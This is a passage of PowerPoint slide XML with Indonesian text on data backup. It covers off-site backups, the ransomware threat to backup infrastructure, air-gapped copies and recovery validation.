              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpencil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> uang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tebusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pembebasannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> ransomware juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menghambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memperburuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengkompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terputus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengenkripsinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemulihan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
